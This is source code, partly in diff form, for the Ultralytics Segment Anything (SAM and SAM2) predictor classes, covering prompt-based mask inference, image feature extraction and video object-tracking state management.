+ + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model_path="sam_model.pt") + >>> predictor.set_image("image.jpg") + >>> masks, scores = predictor.inference(im, bboxes=[[0, 0, 100, 100]]) + """ + # Override prompts if any stored in self.prompts + bboxes = self.prompts.pop("bboxes", bboxes) + points = self.prompts.pop("points", points) + masks = self.prompts.pop("masks", masks) + labels = self.prompts.pop("labels", labels) + + if all(i is None for i in [bboxes, points, masks]): + return self.generate(im, *args, **kwargs) + + return self.prompt_inference(im, bboxes, points, labels, masks, multimask_output) + + def prompt_inference(self, im, bboxes=None, points=None, labels=None, masks=None, multimask_output=False): + """ + Performs image segmentation inference based on input cues using SAM's specialized architecture. + + This internal function leverages the Segment Anything Model (SAM) for prompt-based, real-time segmentation. + It processes various input prompts such as bounding boxes, points, and masks to generate segmentation masks. + + Args: + im (torch.Tensor): Preprocessed input image tensor with shape (N, C, H, W). + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (np.ndarray | None): Low-res masks from previous predictions with shape (N, H, W). For SAM, H=W=256. + multimask_output (bool): Flag to return multiple masks for ambiguous prompts. + + Raises: + AssertionError: If the number of points doesn't match the number of labels, in case labels were passed. + + Returns: + (np.ndarray): Output masks with shape (C, H, W), where C is the number of generated masks.
+ (np.ndarray): Quality scores predicted by the model for each mask, with length C. + + Examples: + >>> predictor = Predictor() + >>> im = torch.rand(1, 3, 1024, 1024) + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores = predictor.prompt_inference(im, bboxes=bboxes) + """ + features = self.get_im_features(im) if self.features is None else self.features + + bboxes, points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + points = (points, labels) if points is not None else None + # Embed prompts + sparse_embeddings, dense_embeddings = self.model.prompt_encoder(points=points, boxes=bboxes, masks=masks) + + # Predict masks + pred_masks, pred_scores = self.model.mask_decoder( + image_embeddings=features, + image_pe=self.model.prompt_encoder.get_dense_pe(), + sparse_prompt_embeddings=sparse_embeddings, + dense_prompt_embeddings=dense_embeddings, + multimask_output=multimask_output, + ) + + # (N, d, H, W) --> (N*d, H, W), (N, d) --> (N*d, ) + # `d` is 1 or 3 depending on `multimask_output`. + return pred_masks.flatten(0, 1), pred_scores.flatten(0, 1) + + def _prepare_prompts(self, dst_shape, bboxes=None, points=None, labels=None, masks=None): + """ + Prepares and transforms the input prompts for processing based on the destination shape. + + Args: + dst_shape (tuple): The target shape (height, width) for the prompts. + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (List | np.ndarray, Optional): Masks for the objects, where each mask is a 2D array. + + Raises: + AssertionError: If the number of points doesn't match the number of labels, in case labels were passed.
+ + Returns: + (tuple): A tuple containing transformed bounding boxes, points, labels, and masks. + """ + src_shape = self.batch[1][0].shape[:2] + r = 1.0 if self.segment_all else min(dst_shape[0] / src_shape[0], dst_shape[1] / src_shape[1]) + # Transform input prompts + if points is not None: + points = torch.as_tensor(points, dtype=torch.float32, device=self.device) + points = points[None] if points.ndim == 1 else points + # Assuming labels are all positive if users don't pass labels. + if labels is None: + labels = np.ones(points.shape[:-1]) + labels = torch.as_tensor(labels, dtype=torch.int32, device=self.device) + assert ( + points.shape[-2] == labels.shape[-1] + ), f"Number of points {points.shape[-2]} should match number of labels {labels.shape[-1]}." + points *= r + if points.ndim == 2: + # (N, 2) --> (N, 1, 2), (N, ) --> (N, 1) + points, labels = points[:, None, :], labels[:, None] + if bboxes is not None: + bboxes = torch.as_tensor(bboxes, dtype=torch.float32, device=self.device) + bboxes = bboxes[None] if bboxes.ndim == 1 else bboxes + bboxes *= r + if masks is not None: + masks = torch.as_tensor(masks, dtype=torch.float32, device=self.device).unsqueeze(1) + return bboxes, points, labels, masks + + def generate( + self, + im, + crop_n_layers=0, + crop_overlap_ratio=512 / 1500, + crop_downscale_factor=1, + point_grids=None, + points_stride=32, + points_batch_size=64, + conf_thres=0.88, + stability_score_thresh=0.95, + stability_score_offset=0.95, + crop_nms_thresh=0.7, + ): + """ + Perform image segmentation using the Segment Anything Model (SAM). + + This method segments an entire image into constituent parts by leveraging SAM's advanced architecture + and real-time performance capabilities. It can optionally work on image crops for finer segmentation. + + Args: + im (torch.Tensor): Input tensor representing the preprocessed image with shape (N, C, H, W). + crop_n_layers (int): Number of layers for additional mask predictions on image crops. 
+ crop_overlap_ratio (float): Overlap between crops, scaled down in subsequent layers. + crop_downscale_factor (int): Scaling factor for sampled points-per-side in each layer. + point_grids (List[np.ndarray] | None): Custom grids for point sampling normalized to [0,1]. + points_stride (int): Number of points to sample along each side of the image. + points_batch_size (int): Batch size for the number of points processed simultaneously. + conf_thres (float): Confidence threshold [0,1] for filtering based on mask quality prediction. + stability_score_thresh (float): Stability threshold [0,1] for mask filtering based on stability. + stability_score_offset (float): Offset value for calculating stability score. + crop_nms_thresh (float): IoU cutoff for NMS to remove duplicate masks between crops. + + Returns: + pred_masks (torch.Tensor): Segmented masks with shape (N, H, W). + pred_scores (torch.Tensor): Confidence scores for each mask with shape (N,). + pred_bboxes (torch.Tensor): Bounding boxes for each mask with shape (N, 4). 
+ + Examples: + >>> predictor = Predictor() + >>> im = torch.rand(1, 3, 1024, 1024) # Example input image + >>> masks, scores, boxes = predictor.generate(im) + """ + import torchvision # scope for faster 'import ultralytics' + + self.segment_all = True + ih, iw = im.shape[2:] + crop_regions, layer_idxs = generate_crop_boxes((ih, iw), crop_n_layers, crop_overlap_ratio) + if point_grids is None: + point_grids = build_all_layer_point_grids(points_stride, crop_n_layers, crop_downscale_factor) + pred_masks, pred_scores, pred_bboxes, region_areas = [], [], [], [] + for crop_region, layer_idx in zip(crop_regions, layer_idxs): + x1, y1, x2, y2 = crop_region + w, h = x2 - x1, y2 - y1 + area = torch.tensor(w * h, device=im.device) + points_scale = np.array([[w, h]]) # w, h + # Crop image and interpolate to input size + crop_im = F.interpolate(im[..., y1:y2, x1:x2], (ih, iw), mode="bilinear", align_corners=False) + # (num_points, 2) + points_for_image = point_grids[layer_idx] * points_scale + crop_masks, crop_scores, crop_bboxes = [], [], [] + for (points,) in batch_iterator(points_batch_size, points_for_image): + pred_mask, pred_score = self.prompt_inference(crop_im, points=points, multimask_output=True) + # Interpolate predicted masks to input size + pred_mask = F.interpolate(pred_mask[None], (h, w), mode="bilinear", align_corners=False)[0] + idx = pred_score > conf_thres + pred_mask, pred_score = pred_mask[idx], pred_score[idx] + + stability_score = calculate_stability_score( + pred_mask, self.model.mask_threshold, stability_score_offset + ) + idx = stability_score > stability_score_thresh + pred_mask, pred_score = pred_mask[idx], pred_score[idx] + # Bool type is much more memory-efficient. 
+ pred_mask = pred_mask > self.model.mask_threshold + # (N, 4) + pred_bbox = batched_mask_to_box(pred_mask).float() + keep_mask = ~is_box_near_crop_edge(pred_bbox, crop_region, [0, 0, iw, ih]) + if not torch.all(keep_mask): + pred_bbox, pred_mask, pred_score = pred_bbox[keep_mask], pred_mask[keep_mask], pred_score[keep_mask] + + crop_masks.append(pred_mask) + crop_bboxes.append(pred_bbox) + crop_scores.append(pred_score) + + # Do nms within this crop + crop_masks = torch.cat(crop_masks) + crop_bboxes = torch.cat(crop_bboxes) + crop_scores = torch.cat(crop_scores) + keep = torchvision.ops.nms(crop_bboxes, crop_scores, self.args.iou) # NMS + crop_bboxes = uncrop_boxes_xyxy(crop_bboxes[keep], crop_region) + crop_masks = uncrop_masks(crop_masks[keep], crop_region, ih, iw) + crop_scores = crop_scores[keep] + + pred_masks.append(crop_masks) + pred_bboxes.append(crop_bboxes) + pred_scores.append(crop_scores) + region_areas.append(area.expand(len(crop_masks))) + + pred_masks = torch.cat(pred_masks) + pred_bboxes = torch.cat(pred_bboxes) + pred_scores = torch.cat(pred_scores) + region_areas = torch.cat(region_areas) + + # Remove duplicate masks between crops + if len(crop_regions) > 1: + scores = 1 / region_areas + keep = torchvision.ops.nms(pred_bboxes, scores, crop_nms_thresh) + pred_masks, pred_bboxes, pred_scores = pred_masks[keep], pred_bboxes[keep], pred_scores[keep] + + return pred_masks, pred_scores, pred_bboxes + + def setup_model(self, model=None, verbose=True): + """ + Initializes the Segment Anything Model (SAM) for inference. + + This method sets up the SAM model by allocating it to the appropriate device and initializing the necessary + parameters for image normalization and other Ultralytics compatibility settings. + + Args: + model (torch.nn.Module | None): A pretrained SAM model. If None, a new model is built based on config. + verbose (bool): If True, prints selected device information. 
+ + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model=sam_model, verbose=True) + """ + device = select_device(self.args.device, verbose=verbose) + if model is None: + model = self.get_model() + model.eval() + self.model = model.to(device) + self.device = device + self.mean = torch.tensor([123.675, 116.28, 103.53]).view(-1, 1, 1).to(device) + self.std = torch.tensor([58.395, 57.12, 57.375]).view(-1, 1, 1).to(device) + + # Ultralytics compatibility settings + self.model.pt = False + self.model.triton = False + self.model.stride = 32 + self.model.fp16 = False + self.done_warmup = True + + def get_model(self): + """Retrieves or builds the Segment Anything Model (SAM) for image segmentation tasks.""" + return build_sam(self.args.model) + + def postprocess(self, preds, img, orig_imgs): + """ + Post-processes SAM's inference outputs to generate object detection masks and bounding boxes. + + This method scales masks and boxes to the original image size and applies a threshold to the mask + predictions. It leverages SAM's advanced architecture for real-time, promptable segmentation tasks. + + Args: + preds (Tuple[torch.Tensor]): The output from SAM model inference, containing: + - pred_masks (torch.Tensor): Predicted masks with shape (N, 1, H, W). + - pred_scores (torch.Tensor): Confidence scores for each mask with shape (N, 1). + - pred_bboxes (torch.Tensor, optional): Predicted bounding boxes if segment_all is True. + img (torch.Tensor): The processed input image tensor with shape (C, H, W). + orig_imgs (List[np.ndarray] | torch.Tensor): The original, unprocessed images. + + Returns: + results (List[Results]): List of Results objects containing detection masks, bounding boxes, and other + metadata for each processed image. 
+ + Examples: + >>> predictor = Predictor() + >>> preds = predictor.inference(img) + >>> results = predictor.postprocess(preds, img, orig_imgs) + """ + # (N, 1, H, W), (N, 1) + pred_masks, pred_scores = preds[:2] + pred_bboxes = preds[2] if self.segment_all else None + names = dict(enumerate(str(i) for i in range(len(pred_masks)))) + + if not isinstance(orig_imgs, list): # input images are a torch.Tensor, not a list + orig_imgs = ops.convert_torch2numpy_batch(orig_imgs) + + results = [] + for masks, orig_img, img_path in zip([pred_masks], orig_imgs, self.batch[0]): + if len(masks) == 0: + masks, pred_bboxes = None, torch.zeros((0, 6), device=pred_masks.device) + else: + masks = ops.scale_masks(masks[None].float(), orig_img.shape[:2], padding=False)[0] + masks = masks > self.model.mask_threshold # to bool + if pred_bboxes is not None: + pred_bboxes = ops.scale_boxes(img.shape[2:], pred_bboxes.float(), orig_img.shape, padding=False) + else: + pred_bboxes = batched_mask_to_box(masks) + # NOTE: SAM models do not return cls info. This `cls` here is just a placeholder for consistency. + cls = torch.arange(len(pred_masks), dtype=torch.int32, device=pred_masks.device) + pred_bboxes = torch.cat([pred_bboxes, pred_scores[:, None], cls[:, None]], dim=-1) + results.append(Results(orig_img, path=img_path, names=names, masks=masks, boxes=pred_bboxes)) + # Reset segment-all mode. + self.segment_all = False + return results + + def setup_source(self, source): + """ + Sets up the data source for inference. + + This method configures the data source from which images will be fetched for inference. It supports + various input types such as image files, directories, video files, and other compatible data sources. + + Args: + source (str | Path | None): The path or identifier for the image data source. Can be a file path, + directory path, URL, or other supported source types. 
+ + Examples: + >>> predictor = Predictor() + >>> predictor.setup_source("path/to/images") + >>> predictor.setup_source("video.mp4") + >>> predictor.setup_source(None) # Uses default source if available + + Notes: + - If source is None, the method may use a default source if configured. + - The method adapts to different source types and prepares them for subsequent inference steps. + - Supported source types may include local files, directories, URLs, and video streams. + """ + if source is not None: + super().setup_source(source) + + def set_image(self, image): + """ + Preprocesses and sets a single image for inference. + + This method prepares the model for inference on a single image by setting up the model if not already + initialized, configuring the data source, and preprocessing the image for feature extraction. It + ensures that only one image is set at a time and extracts image features for subsequent use. + + Args: + image (str | np.ndarray): Path to the image file as a string, or a numpy array representing + an image read by cv2. + + Raises: + AssertionError: If more than one image is attempted to be set. + + Examples: + >>> predictor = Predictor() + >>> predictor.set_image("path/to/image.jpg") + >>> predictor.set_image(cv2.imread("path/to/image.jpg")) + + Notes: + - This method should be called before performing inference on a new image. + - The extracted features are stored in the `self.features` attribute for later use. + """ + if self.model is None: + self.setup_model(model=None) + self.setup_source(image) + assert len(self.dataset) == 1, "`set_image` only supports setting one image!" 
+ for batch in self.dataset: + im = self.preprocess(batch[1]) + self.features = self.get_im_features(im) + break + + def get_im_features(self, im): + """Extracts image features using the SAM model's image encoder for subsequent mask prediction.""" + assert ( + isinstance(self.imgsz, (tuple, list)) and self.imgsz[0] == self.imgsz[1] + ), f"SAM models only support square image size, but got {self.imgsz}." + self.model.set_imgsz(self.imgsz) + return self.model.image_encoder(im) + + def set_prompts(self, prompts): + """Sets prompts for subsequent inference operations.""" + self.prompts = prompts + + def reset_image(self): + """Resets the current image and its features, clearing them for subsequent inference.""" + self.im = None + self.features = None + + @staticmethod + def remove_small_regions(masks, min_area=0, nms_thresh=0.7): + """ + Remove small disconnected regions and holes from segmentation masks. + + This function performs post-processing on segmentation masks generated by the Segment Anything Model (SAM). + It removes small disconnected regions and holes from the input masks, and then performs Non-Maximum + Suppression (NMS) to eliminate any newly created duplicate boxes. + + Args: + masks (torch.Tensor): Segmentation masks to be processed, with shape (N, H, W) where N is the number of + masks, H is height, and W is width. + min_area (int): Minimum area threshold for removing disconnected regions and holes. Regions smaller than + this will be removed. + nms_thresh (float): IoU threshold for the NMS algorithm to remove duplicate boxes. + + Returns: + new_masks (torch.Tensor): Processed masks with small regions removed, shape (N, H, W). + keep (List[int]): Indices of remaining masks after NMS, for filtering corresponding boxes. 
+ + Examples: + >>> masks = torch.rand(5, 640, 640) > 0.5 # 5 random binary masks + >>> new_masks, keep = remove_small_regions(masks, min_area=100, nms_thresh=0.7) + >>> print(f"Original masks: {masks.shape}, Processed masks: {new_masks.shape}") + >>> print(f"Indices of kept masks: {keep}") + """ + import torchvision # scope for faster 'import ultralytics' + + if len(masks) == 0: + return masks + + # Filter small disconnected regions and holes + new_masks = [] + scores = [] + for mask in masks: + mask = mask.cpu().numpy().astype(np.uint8) + mask, changed = remove_small_regions(mask, min_area, mode="holes") + unchanged = not changed + mask, changed = remove_small_regions(mask, min_area, mode="islands") + unchanged = unchanged and not changed + + new_masks.append(torch.as_tensor(mask).unsqueeze(0)) + # Give score=0 to changed masks and 1 to unchanged masks so NMS prefers masks not needing postprocessing + scores.append(float(unchanged)) + + # Recalculate boxes and remove any new duplicates + new_masks = torch.cat(new_masks, dim=0) + boxes = batched_mask_to_box(new_masks) + keep = torchvision.ops.nms(boxes.float(), torch.as_tensor(scores), nms_thresh) + + return new_masks[keep].to(device=masks.device, dtype=masks.dtype), keep + + +class SAM2Predictor(Predictor): + """ + SAM2Predictor class for advanced image segmentation using Segment Anything Model 2 architecture. + + This class extends the base Predictor class to implement SAM2-specific functionality for image + segmentation tasks. It provides methods for model initialization, feature extraction, and + prompt-based inference. + + Attributes: + _bb_feat_sizes (List[Tuple[int, int]]): Feature sizes for different backbone levels. + model (torch.nn.Module): The loaded SAM2 model. + device (torch.device): The device (CPU or GPU) on which the model is loaded. + features (Dict[str, torch.Tensor]): Cached image features for efficient inference. + segment_all (bool): Flag to indicate if all segments should be predicted. 
+ prompts (Dict): Dictionary to store various types of prompts for inference. + + Methods: + get_model: Retrieves and initializes the SAM2 model. + prompt_inference: Performs image segmentation inference based on various prompts. + set_image: Preprocesses and sets a single image for inference. + get_im_features: Extracts and processes image features using SAM2's image encoder. + + Examples: + >>> predictor = SAM2Predictor(cfg) + >>> predictor.set_image("path/to/image.jpg") + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, _ = predictor.prompt_inference(predictor.im, bboxes=bboxes) + >>> print(f"Predicted {len(masks)} masks with average score {scores.mean():.2f}") + """ + + _bb_feat_sizes = [ + (256, 256), + (128, 128), + (64, 64), + ] + + def get_model(self): + """Retrieves and initializes the Segment Anything Model 2 (SAM2) for image segmentation tasks.""" + return build_sam(self.args.model) + + def prompt_inference( + self, + im, + bboxes=None, + points=None, + labels=None, + masks=None, + multimask_output=False, + img_idx=-1, + ): + """ + Performs image segmentation inference based on various prompts using SAM2 architecture. + + This method leverages the Segment Anything Model 2 (SAM2) to generate segmentation masks for input images + based on provided prompts such as bounding boxes, points, or existing masks. It supports both single and + multi-object prediction scenarios. + + Args: + im (torch.Tensor): Preprocessed input image tensor with shape (N, C, H, W). + bboxes (np.ndarray | List[List[float]] | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List[List[float]] | None): Object location points with shape (N, 2), in pixels. + labels (np.ndarray | List[int] | None): Point prompt labels with shape (N,). 1 = foreground, 0 = background. + masks (np.ndarray | None): Low-resolution masks from previous predictions with shape (N, H, W). + multimask_output (bool): Flag to return multiple masks for ambiguous prompts. 
+ img_idx (int): Index of the image in the batch to process. + + Returns: + (np.ndarray): Output masks with shape (C, H, W), where C is the number of generated masks. + (np.ndarray): Quality scores for each mask, with length C. + + Examples: + >>> predictor = SAM2Predictor(cfg) + >>> image = torch.rand(1, 3, 640, 640) + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores = predictor.prompt_inference(image, bboxes=bboxes) + >>> print(f"Generated {masks.shape[0]} masks with average score {scores.mean():.2f}") + + Notes: + - The method supports batched inference for multiple objects when points or bboxes are provided. + - Input prompts (bboxes, points) are automatically scaled to match the input image dimensions. + - When both bboxes and points are provided, they are merged into a single 'points' input for the model. + + References: + - SAM 2 paper: https://arxiv.org/abs/2408.00714 + """ + features = self.get_im_features(im) if self.features is None else self.features + + points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + points = (points, labels) if points is not None else None + + sparse_embeddings, dense_embeddings = self.model.sam_prompt_encoder( + points=points, + boxes=None, + masks=masks, + ) + # Predict masks + batched_mode = points is not None and points[0].shape[0] > 1 # multi object prediction + high_res_features = [feat_level[img_idx].unsqueeze(0) for feat_level in features["high_res_feats"]] + pred_masks, pred_scores, _, _ = self.model.sam_mask_decoder( + image_embeddings=features["image_embed"][img_idx].unsqueeze(0), + image_pe=self.model.sam_prompt_encoder.get_dense_pe(), + sparse_prompt_embeddings=sparse_embeddings, + dense_prompt_embeddings=dense_embeddings, + multimask_output=multimask_output, + repeat_image=batched_mode, + high_res_features=high_res_features, + ) + # (N, d, H, W) --> (N*d, H, W), (N, d) --> (N*d, ) + # `d` is 1 or 3 depending on `multimask_output`.
+ return pred_masks.flatten(0, 1), pred_scores.flatten(0, 1) + + def _prepare_prompts(self, dst_shape, bboxes=None, points=None, labels=None, masks=None): + """ + Prepares and transforms the input prompts for processing based on the destination shape. + + Args: + dst_shape (tuple): The target shape (height, width) for the prompts. + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (List | np.ndarray, Optional): Masks for the objects, where each mask is a 2D array. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (tuple): A tuple containing transformed points, labels, and masks. + """ + bboxes, points, labels, masks = super()._prepare_prompts(dst_shape, bboxes, points, labels, masks) + if bboxes is not None: + bboxes = bboxes.view(-1, 2, 2) + bbox_labels = torch.tensor([[2, 3]], dtype=torch.int32, device=bboxes.device).expand(len(bboxes), -1) + # NOTE: merge "boxes" and "points" into a single "points" input + # (where boxes are added at the beginning) to model.sam_prompt_encoder + if points is not None: + points = torch.cat([bboxes, points], dim=1) + labels = torch.cat([bbox_labels, labels], dim=1) + else: + points, labels = bboxes, bbox_labels + return points, labels, masks + + def set_image(self, image): + """ + Preprocesses and sets a single image for inference using the SAM2 model. + + This method initializes the model if not already done, configures the data source to the specified image, + and preprocesses the image for feature extraction. It supports setting only one image at a time. 
def get_im_features(self, im):
    """
    Encode an image with the SAM2 backbone and reshape the outputs into spatial feature maps.

    The method pushes `self.imgsz` to the model, recomputes `self._bb_feat_sizes` as the image size divided
    by 4, 8 and 16, runs `self.model.forward_image`, and reshapes every feature level returned by
    `self.model._prepare_backbone_features` to `(1, C, H, W)` using those sizes.

    Args:
        im (torch.Tensor): Preprocessed image tensor, passed unchanged to `self.model.forward_image`.

    Returns:
        (dict): `"image_embed"` holds the last (smallest-size) feature map and `"high_res_feats"` is the
            list of the remaining, larger maps in their original order.

    Raises:
        AssertionError: If `self.imgsz` is not a tuple/list whose first two entries are equal.
    """
    is_square = isinstance(self.imgsz, (tuple, list)) and self.imgsz[0] == self.imgsz[1]
    assert is_square, f"SAM 2 models only support square image size, but got {self.imgsz}."

    model = self.model
    model.set_imgsz(self.imgsz)
    # Spatial size of each backbone level: strides 4, 8 and 16 relative to the input image.
    self._bb_feat_sizes = [[side // (4 * scale) for side in self.imgsz] for scale in (1, 2, 4)]

    backbone_out = model.forward_image(im)
    _, vision_feats, _, _ = model._prepare_backbone_features(backbone_out)
    if model.directly_add_no_mem_embed:
        # Add the "no memory" embedding to the last feature level only.
        vision_feats[-1] = vision_feats[-1] + model.no_mem_embed

    # Pair levels with sizes starting from the last one, then restore the original ordering.
    maps = []
    for feat, feat_size in zip(reversed(vision_feats), reversed(self._bb_feat_sizes)):
        maps.append(feat.permute(1, 2, 0).view(1, -1, *feat_size))
    maps.reverse()

    return {"image_embed": maps[-1], "high_res_feats": maps[:-1]}
def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None):
    """
    Build the video predictor and register lazy creation of its inference state.

    After delegating to the parent constructor, the predictor starts with an empty `inference_state`,
    enables non-overlapping masks, disables both "clear non-conditioning memory" options, and appends
    `self.init_state` to the `"on_predict_start"` callback list.

    Args:
        cfg (Dict): Configuration containing default settings. Defaults to DEFAULT_CFG.
        overrides (Dict | None): Values overriding the default configuration.
        _callbacks (Dict | None): Callbacks forwarded to the parent constructor.

    Examples:
        >>> predictor = SAM2VideoPredictor(cfg=DEFAULT_CFG)
        >>> predictor = SAM2VideoPredictor(overrides={"imgsz": 640})
    """
    super().__init__(cfg, overrides, _callbacks)

    # Stays empty until `init_state` fills it; that hook treats a non-empty dict as "already initialised".
    self.inference_state = {}

    # Behaviour flags read by `postprocess`, `inference` and `propagate_in_video_preflight`.
    self.non_overlap_masks = True
    self.clear_non_cond_mem_around_input = self.clear_non_cond_mem_for_multi_obj = False

    # Have the inference state created when prediction starts.
    on_predict_start = self.callbacks["on_predict_start"]
    on_predict_start.append(self.init_state)
+ """ + # Override prompts if any stored in self.prompts + bboxes = self.prompts.pop("bboxes", bboxes) + points = self.prompts.pop("points", points) + masks = self.prompts.pop("masks", masks) + + frame = self.dataset.frame + self.inference_state["im"] = im + output_dict = self.inference_state["output_dict"] + if len(output_dict["cond_frame_outputs"]) == 0: # initialize prompts + points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + if points is not None: + for i in range(len(points)): + self.add_new_prompts(obj_id=i, points=points[[i]], labels=labels[[i]], frame_idx=frame) + elif masks is not None: + for i in range(len(masks)): + self.add_new_prompts(obj_id=i, masks=masks[[i]], frame_idx=frame) + self.propagate_in_video_preflight() + + consolidated_frame_inds = self.inference_state["consolidated_frame_inds"] + batch_size = len(self.inference_state["obj_idx_to_id"]) + if len(output_dict["cond_frame_outputs"]) == 0: + raise RuntimeError("No points are provided; please add points first") + + if frame in consolidated_frame_inds["cond_frame_outputs"]: + storage_key = "cond_frame_outputs" + current_out = output_dict[storage_key][frame] + if self.clear_non_cond_mem_around_input and (self.clear_non_cond_mem_for_multi_obj or batch_size <= 1): + # clear non-conditioning memory of the surrounding frames + self._clear_non_cond_mem_around_input(frame) + elif frame in consolidated_frame_inds["non_cond_frame_outputs"]: + storage_key = "non_cond_frame_outputs" + current_out = output_dict[storage_key][frame] + else: + storage_key = "non_cond_frame_outputs" + current_out = self._run_single_frame_inference( + output_dict=output_dict, + frame_idx=frame, + batch_size=batch_size, + is_init_cond_frame=False, + point_inputs=None, + mask_inputs=None, + reverse=False, + run_mem_encoder=True, + ) + output_dict[storage_key][frame] = current_out + # Create slices of per-object outputs for subsequent interaction with each + # individual object after 
def postprocess(self, preds, img, orig_imgs):
    """
    Run the parent post-processing, then optionally make the masks of each result non-overlapping.

    When `self.non_overlap_masks` is set, every result that has at least one mask gets its mask data
    replaced by the output of `self.model._apply_non_overlapping_constraints`. Results without masks
    are left untouched.

    Args:
        preds (Tuple[torch.Tensor]): The predictions from the model.
        img (torch.Tensor): The processed image tensor.
        orig_imgs (List[np.ndarray]): The original images before processing.

    Returns:
        results (list): The post-processed predictions returned by the parent class, updated in place.
    """
    results = super().postprocess(preds, img, orig_imgs)
    if not self.non_overlap_masks:
        return results

    for result in results:
        has_masks = result.masks is not None and len(result.masks) != 0
        if has_masks:
            # The constraint helper works on a batched tensor: add a leading axis, then strip it again.
            batched = result.masks.data.unsqueeze(0)
            result.masks.data = self.model._apply_non_overlapping_constraints(batched)[0]
    return results
It also handles the generation of new segmentations + based on the provided prompts and the existing state. + + Args: + obj_id (int): The ID of the object to which the prompts are associated. + points (torch.Tensor, Optional): The coordinates of the points of interest. Defaults to None. + labels (torch.Tensor, Optional): The labels corresponding to the points. Defaults to None. + masks (torch.Tensor, optional): Binary masks for the object. Defaults to None. + frame_idx (int, optional): The index of the frame to which the prompts are applied. Defaults to 0. + + Returns: + (tuple): A tuple containing the flattened predicted masks and a tensor of ones indicating the number of objects. + + Raises: + AssertionError: If both `masks` and `points` are provided, or neither is provided. + + Note: + - Only one type of prompt (either points or masks) can be added per call. + - If the frame is being tracked for the first time, it is treated as an initial conditioning frame. + - The method handles the consolidation of outputs and resizing of masks to the original video resolution. + """ + assert (masks is None) ^ (points is None), "'masks' and 'points' prompts are not compatible with each other." + obj_idx = self._obj_id_to_idx(obj_id) + + point_inputs = None + pop_key = "point_inputs_per_obj" + if points is not None: + point_inputs = {"point_coords": points, "point_labels": labels} + self.inference_state["point_inputs_per_obj"][obj_idx][frame_idx] = point_inputs + pop_key = "mask_inputs_per_obj" + self.inference_state["mask_inputs_per_obj"][obj_idx][frame_idx] = masks + self.inference_state[pop_key][obj_idx].pop(frame_idx, None) + # If this frame hasn't been tracked before, we treat it as an initial conditioning + # frame, meaning that the inputs points are to generate segments on this frame without + # using any memory from other frames, like in SAM. Otherwise (if it has been tracked), + # the input points will be used to correct the already tracked masks. 
+ is_init_cond_frame = frame_idx not in self.inference_state["frames_already_tracked"] + obj_output_dict = self.inference_state["output_dict_per_obj"][obj_idx] + obj_temp_output_dict = self.inference_state["temp_output_dict_per_obj"][obj_idx] + # Add a frame to conditioning output if it's an initial conditioning frame or + # if the model sees all frames receiving clicks/mask as conditioning frames. + is_cond = is_init_cond_frame or self.model.add_all_frames_to_correct_as_cond + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + + # Get any previously predicted mask logits on this object and feed it along with + # the new clicks into the SAM mask decoder. + prev_sam_mask_logits = None + # lookup temporary output dict first, which contains the most recent output + # (if not found, then lookup conditioning and non-conditioning frame output) + if point_inputs is not None: + prev_out = ( + obj_temp_output_dict[storage_key].get(frame_idx) + or obj_output_dict["cond_frame_outputs"].get(frame_idx) + or obj_output_dict["non_cond_frame_outputs"].get(frame_idx) + ) + + if prev_out is not None and prev_out.get("pred_masks") is not None: + prev_sam_mask_logits = prev_out["pred_masks"].to(device=self.device, non_blocking=True) + # Clamp the scale of prev_sam_mask_logits to avoid rare numerical issues. + prev_sam_mask_logits.clamp_(-32.0, 32.0) + current_out = self._run_single_frame_inference( + output_dict=obj_output_dict, # run on the slice of a single object + frame_idx=frame_idx, + batch_size=1, # run on the slice of a single object + is_init_cond_frame=is_init_cond_frame, + point_inputs=point_inputs, + mask_inputs=masks, + reverse=False, + # Skip the memory encoder when adding clicks or mask. We execute the memory encoder + # at the beginning of `propagate_in_video` (after user finalize their clicks). This + # allows us to enforce non-overlapping constraints on all objects before encoding + # them into memory. 
@smart_inference_mode()
def propagate_in_video_preflight(self):
    """
    Prepare inference_state and consolidate temporary outputs before tracking.

    This method marks the start of tracking, after which `_obj_id_to_idx` refuses new object ids.
    It consolidates the per-object temporary outputs in `temp_output_dict_per_obj` (non-conditioning
    frames first, then conditioning frames), runs the memory encoder on them, merges the results into
    `output_dict`, and finally checks that the bookkeeping is consistent with the recorded inputs.

    Raises:
        AssertionError: If a consolidated conditioning frame is missing from `output_dict`, or if the
            consolidated frame indices differ from the frames that hold point or mask inputs.
    """
    state = self.inference_state
    # Tracking has started and we don't allow adding new objects until session is reset.
    state["tracking_has_started"] = True
    batch_size = len(state["obj_idx_to_id"])
    # Loop-invariant: whether non-conditioning memory around an input frame should be cleared.
    clear_around_input = self.clear_non_cond_mem_around_input and (
        self.clear_non_cond_mem_for_multi_obj or batch_size <= 1
    )

    # Consolidate per-object temporary outputs in "temp_output_dict_per_obj" and
    # add them into "output_dict".
    temp_output_dict_per_obj = state["temp_output_dict_per_obj"]
    output_dict = state["output_dict"]
    # "consolidated_frame_inds" contains indices of those frames where consolidated
    # temporary outputs have been added (either in this call or any previous calls
    # to `propagate_in_video_preflight`).
    consolidated_frame_inds = state["consolidated_frame_inds"]
    # Use an ordered tuple (not a set) so that the non-conditioning pass always runs first.
